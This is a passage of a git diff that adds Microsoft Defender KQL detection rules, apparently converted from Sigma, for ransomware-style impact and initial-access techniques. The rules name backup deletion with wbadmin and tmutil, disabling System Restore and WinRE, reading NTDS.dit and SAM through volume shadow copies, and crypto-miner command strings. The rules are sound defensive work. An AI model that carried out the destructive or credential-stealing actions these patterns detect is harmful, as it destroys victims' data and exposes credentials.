being backed up. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents +| where ProcessCommandLine contains "addexclusion" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil") \ No newline at end of file diff --git a/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql b/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql new file mode 100644 index 00000000..2a0ddd39 --- /dev/null +++ b/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql @@ -0,0 +1,10 @@ +// Title: New Root or CA or AuthRoot Certificate to Store +// Author: frack113 +// Date: 2022-04-04 +// Level: medium +// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceRegistryEvents +| where RegistryValueData =~ "Binary Data" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates*") and RegistryKey endswith "\\Blob" \ No newline at end of file diff --git a/KQL/rules/Impact/portable_gpg_exe_execution.kql b/KQL/rules/Impact/portable_gpg_exe_execution.kql new file mode 100644 index 00000000..391e214a --- /dev/null +++ b/KQL/rules/Impact/portable_gpg_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Portable Gpg.EXE Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-06 +// Level: medium +// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 + +DeviceProcessEvents +| where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\"))) \ No newline at end of file diff --git a/KQL/rules/Impact/potential_crypto_mining_activity.kql b/KQL/rules/Impact/potential_crypto_mining_activity.kql new file mode 100644 index 00000000..d6cfa7fc --- /dev/null +++ b/KQL/rules/Impact/potential_crypto_mining_activity.kql @@ -0,0 +1,13 @@ +// Title: Potential Crypto Mining Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects command line parameters or strings often used by crypto miners +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Legitimate use of crypto miners +// - Some build frameworks + +DeviceProcessEvents +| where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -"))) \ No newline at end of file diff --git a/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql b/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql new file mode 100644 index 00000000..14ac4dfa --- /dev/null +++ b/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql @@ -0,0 +1,10 @@ +// Title: Potential File Overwrite Via Sysinternals SDelete +// Author: frack113 +// Date: 2021-06-03 +// Level: high +// Description: Detects the use of SDelete to erase a file not the free space +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?"))) \ No newline at end of file diff --git a/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql b/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql new file mode 100644 index 00000000..1a5b5174 --- /dev/null +++ b/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql @@ -0,0 +1,10 @@ +// Title: Potential Ransomware Activity Using LegalNotice Message +// Author: frack113 +// Date: 2022-12-11 +// Level: high +// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1491.001 + +DeviceRegistryEvents +| where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText") \ No newline at end of file diff --git a/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql b/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql new file mode 100644 index 00000000..aa380599 --- /dev/null +++ b/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql @@ -0,0 +1,13 @@ +// Title: Potential Secure Deletion with SDelete +// Author: Thomas Patzke +// Date: 2017-06-14 +// Level: medium +// Description: Detects files that have extensions commonly seen while SDelete is used to wipe files. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.defense-evasion, attack.t1070.004, attack.t1027.005, attack.t1485, attack.t1553.002, attack.s0195 +// False Positives: +// - Legitimate usage of SDelete +// - Files that are interacted with that have these extensions legitimately + +DeviceRegistryEvents +| where RegistryKey endswith ".AAA" or RegistryKey endswith ".ZZZ" \ No newline at end of file diff --git a/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql b/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql new file mode 100644 index 00000000..2adfd108 --- /dev/null +++ b/KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql @@ -0,0 +1,12 @@ +// Title: Potential Suspicious Change To Sensitive/Critical Files +// Author: @d4ns4n_ (Wuerth-Phoenix) +// Date: 2023-05-30 +// Level: medium +// Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1565.001 +// False Positives: +// - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed. + +DeviceProcessEvents +| where ((ProcessCommandLine contains ">" and (FolderPath endswith "/cat" or FolderPath endswith "/echo" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/tail")) or (FolderPath endswith "/emacs" or FolderPath endswith "/nano" or FolderPath endswith "/sed" or FolderPath endswith "/vi" or FolderPath endswith "/vim")) and (ProcessCommandLine contains "/bin/login" or ProcessCommandLine contains "/bin/passwd" or ProcessCommandLine contains "/boot/" or (ProcessCommandLine contains "/etc/" and ProcessCommandLine contains ".conf") or ProcessCommandLine contains "/etc/cron." or ProcessCommandLine contains "/etc/crontab" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/init.d" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/opt/bin/" or ProcessCommandLine contains "/sbin" or ProcessCommandLine contains "/usr/bin/" or ProcessCommandLine contains "/usr/local/bin/") \ No newline at end of file diff --git a/KQL/rules/Impact/registry_disable_system_restore.kql b/KQL/rules/Impact/registry_disable_system_restore.kql new file mode 100644 index 00000000..1dfead8f --- /dev/null +++ b/KQL/rules/Impact/registry_disable_system_restore.kql @@ -0,0 +1,10 @@ +// Title: Registry Disable System Restore +// Author: frack113 +// Date: 2022-04-04 +// Level: high +// Description: Detects the modification of the registry to disable a system restore on the computer +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR") \ No newline at end of file diff --git a/KQL/rules/Impact/renamed_gpg_exe_execution.kql b/KQL/rules/Impact/renamed_gpg_exe_execution.kql new file mode 100644 index 00000000..eb49ba18 --- /dev/null +++ b/KQL/rules/Impact/renamed_gpg_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Gpg.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2023-08-09 +// Level: high +// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe"))) \ No newline at end of file diff --git a/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql b/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql new file mode 100644 index 00000000..8ca5bce7 --- /dev/null +++ b/KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql @@ -0,0 +1,12 @@ +// Title: Renamed Sysinternals Sdelete Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-06 +// Level: high +// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 +// False Positives: +// - System administrator usage + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql new file mode 100644 index 00000000..0aaa8b64 --- /dev/null +++ b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql @@ -0,0 +1,13 @@ +// Title: Sensitive File Access Via Volume Shadow Copy Backup +// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +// Date: 2021-08-09 +// Level: high +// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit) + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY") \ No newline at end of file diff --git a/KQL/rules/Impact/stop_windows_service_via_net_exe.kql b/KQL/rules/Impact/stop_windows_service_via_net_exe.kql new file mode 100644 index 00000000..a7dabeb3 --- /dev/null +++ b/KQL/rules/Impact/stop_windows_service_via_net_exe.kql @@ -0,0 +1,12 @@ +// Title: Stop Windows Service Via Net.EXE +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-05 +// Level: low +// Description: Detects the stopping of a Windows service via the "net" utility. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly + +DeviceProcessEvents +| where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) \ No newline at end of file diff --git a/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql b/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql new file mode 100644 index 00000000..452acd52 --- /dev/null +++ b/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql @@ -0,0 +1,12 @@ +// Title: Stop Windows Service Via PowerShell Stop-Service +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-05 +// Level: low +// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service" +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly + +DeviceProcessEvents +| where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql b/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql new file mode 100644 index 00000000..14fd63aa --- /dev/null +++ b/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql @@ -0,0 +1,12 @@ +// Title: Stop Windows Service Via Sc.EXE +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-05 +// Level: low +// Description: Detects the stopping of a Windows service via the "sc.exe" utility +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly + +DeviceProcessEvents +| where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe") \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql b/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql new file mode 100644 index 00000000..86e85510 --- /dev/null +++ b/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Creation TXT File in User Desktop +// Author: frack113 +// Date: 2021-12-26 +// Level: high +// Description: Ransomware create txt file in the user Desktop +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt" \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown.kql b/KQL/rules/Impact/suspicious_execution_of_shutdown.kql new file mode 100644 index 00000000..667bed26 --- /dev/null +++ b/KQL/rules/Impact/suspicious_execution_of_shutdown.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution of Shutdown +// Author: frack113 +// Date: 2022-01-01 +// Level: medium +// Description: Use of the commandline to shutdown or reboot windows +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1529 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql b/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql new file mode 100644 index 00000000..86c8dbc8 --- /dev/null +++ b/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Execution of Shutdown to Log Out +// Author: frack113 +// Date: 2022-10-01 +// Level: medium +// Description: Detects the rare use of the command line tool shutdown to logoff a user +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1529 + +DeviceProcessEvents +| where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_macos_firmware_activity.kql b/KQL/rules/Impact/suspicious_macos_firmware_activity.kql new file mode 100644 index 00000000..df36ed47 --- /dev/null +++ b/KQL/rules/Impact/suspicious_macos_firmware_activity.kql @@ -0,0 +1,12 @@ +// Title: Suspicious MacOS Firmware Activity +// Author: Austin Songer @austinsonger +// Date: 2021-09-30 +// Level: medium +// Description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. +// MITRE Tactic: Impact +// Tags: attack.impact +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "setpasswd" or ProcessCommandLine contains "full" or ProcessCommandLine contains "delete" or ProcessCommandLine contains "check") and FolderPath =~ "/usr/sbin/firmwarepasswd" \ No newline at end of file diff --git a/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql b/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql new file mode 100644 index 00000000..655c225c --- /dev/null +++ b/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Reg Add BitLocker +// Author: frack113 +// Date: 2021-11-15 +// Level: high +// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f") \ No newline at end of file diff --git a/KQL/rules/Impact/system_shutdown_reboot_macos.kql b/KQL/rules/Impact/system_shutdown_reboot_macos.kql new file mode 100644 index 00000000..fdd299b4 --- /dev/null +++ b/KQL/rules/Impact/system_shutdown_reboot_macos.kql @@ -0,0 +1,12 @@ +// Title: System Shutdown/Reboot - MacOs +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: informational +// Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1529 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents +| where FolderPath endswith "/shutdown" or FolderPath endswith "/reboot" or FolderPath endswith "/halt" \ No newline at end of file diff --git a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql new file mode 100644 index 00000000..e07291bf --- /dev/null +++ b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql @@ -0,0 +1,14 @@ +// Title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-29 +// Level: medium +// Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". +An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where ProcessCommandLine contains "delete" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil") \ No newline at end of file diff --git a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql new file mode 100644 index 00000000..621414cc --- /dev/null +++ b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql @@ -0,0 +1,14 @@ +// Title: Time Machine Backup Disabled Via Tmutil - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-29 +// Level: medium +// Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". +An attacker can use this to prevent backups from occurring. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate administrator activity + +DeviceProcessEvents +| where ProcessCommandLine contains "disable" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil") \ No newline at end of file diff --git a/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql b/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql new file mode 100644 index 00000000..42e6194f --- /dev/null +++ b/KQL/rules/Impact/user_has_been_deleted_via_userdel.kql @@ -0,0 +1,12 @@ +// Title: User Has Been Deleted Via Userdel +// Author: Tuan Le (NCSGroup) +// Date: 2022-12-26 +// Level: medium +// Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1531 +// False Positives: +// - Legitimate administrator activities + +DeviceProcessEvents +| where FolderPath endswith "/userdel" \ No newline at end of file diff --git a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql new file mode 100644 index 00000000..50aba8b5 --- /dev/null +++ b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql @@ -0,0 +1,15 @@ +// Title: Windows Backup Deleted Via Wbadmin.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-13 +// Level: medium +// Description: Detects the deletion of backups or system state backups via "wbadmin.exe". +This technique is used by numerous ransomware families and actors. +This may only be successful on server platforms that have Windows Backup enabled. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate backup activity from administration scripts and software. + +DeviceProcessEvents +| where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0")) \ No newline at end of file diff --git a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql new file mode 100644 index 00000000..8c12f212 --- /dev/null +++ b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql @@ -0,0 +1,15 @@ +// Title: Windows Recovery Environment Disabled Via Reagentc +// Author: Daniel Koifman (KoifSec), Michael Vilshin +// Date: 2025-07-31 +// Level: medium +// Description: Detects attempts to disable windows recovery environment using Reagentc. +ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE). +It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "-disable" or ProcessCommandLine contains "/disable" or ProcessCommandLine contains "–disable" or ProcessCommandLine contains "—disable" or ProcessCommandLine contains "―disable") and (FolderPath endswith "\\reagentc.exe" or ProcessVersionInfoOriginalFileName =~ "reagentc.exe") \ No newline at end of file diff --git a/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql b/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql new file mode 100644 index 00000000..9ede513f --- /dev/null +++ b/KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql @@ -0,0 +1,12 @@ +// Title: Disk Image Mounting Via Hdiutil - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-10 +// Level: medium +// Description: Detects the execution of the hdiutil utility in order to mount disk images. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.collection, attack.t1566.001, attack.t1560.001 +// False Positives: +// - Legitimate usage of hdiutil by administrators and users. + +DeviceProcessEvents +| where (ProcessCommandLine contains "attach " or ProcessCommandLine contains "mount ") and FolderPath endswith "/hdiutil" \ No newline at end of file diff --git a/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql b/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql new file mode 100644 index 00000000..383905ac --- /dev/null +++ b/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql @@ -0,0 +1,12 @@ +// Title: ISO File Created Within Temp Folders +// Author: @sam0x90 +// Date: 2022-07-30 +// Level: high +// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Potential FP by sysadmin opening a zip file containing a legitimate ISO file + +DeviceFileEvents +| where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso") \ No newline at end of file diff --git a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql new file mode 100644 index 00000000..c897e99c --- /dev/null +++ b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql @@ -0,0 +1,14 @@ +// Title: ISO or Image Mount Indicator in Recent Files +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-11 +// Level: medium +// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. +This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Cases in which a user mounts an image file for legitimate reasons + +DeviceFileEvents +| where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk") \ No newline at end of file diff --git a/KQL/rules/Initial Access/octopus_scanner_malware.kql b/KQL/rules/Initial Access/octopus_scanner_malware.kql new file mode 100644 index 00000000..9ec9586d --- /dev/null +++ b/KQL/rules/Initial Access/octopus_scanner_malware.kql @@ -0,0 +1,10 @@ +// Title: Octopus Scanner Malware +// Author: NVISO +// Date: 2020-06-09 +// Level: high +// Description: Detects Octopus Scanner Malware. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1195, attack.t1195.001 + +DeviceFileEvents +| where FolderPath endswith "\\AppData\\Local\\Microsoft\\Cache134.dat" or FolderPath endswith "\\AppData\\Local\\Microsoft\\ExplorerSync.db" \ No newline at end of file diff --git a/KQL/rules/Initial Access/office_macro_file_creation.kql b/KQL/rules/Initial Access/office_macro_file_creation.kql new file mode 100644 index 00000000..cee346c6 --- /dev/null +++ b/KQL/rules/Initial Access/office_macro_file_creation.kql @@ -0,0 +1,12 @@ +// Title: Office Macro File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-23 +// Level: low +// Description: Detects the creation of a new office macro files on the systems +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - Very common in environments that rely heavily on macro documents + +DeviceFileEvents +| where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm" \ No newline at end of file diff --git a/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql b/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql new file mode 100644 index 00000000..84f15830 --- /dev/null +++ b/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql @@ -0,0 +1,10 @@ +// Title: Office Macro File Creation From Suspicious Process +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-23 +// Level: high +// Description: Detects the creation of a office macro file from a a suspicious process +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") \ No newline at end of file diff --git a/KQL/rules/Initial Access/office_macro_file_download.kql b/KQL/rules/Initial Access/office_macro_file_download.kql new file mode 100644 index 00000000..ad71288f 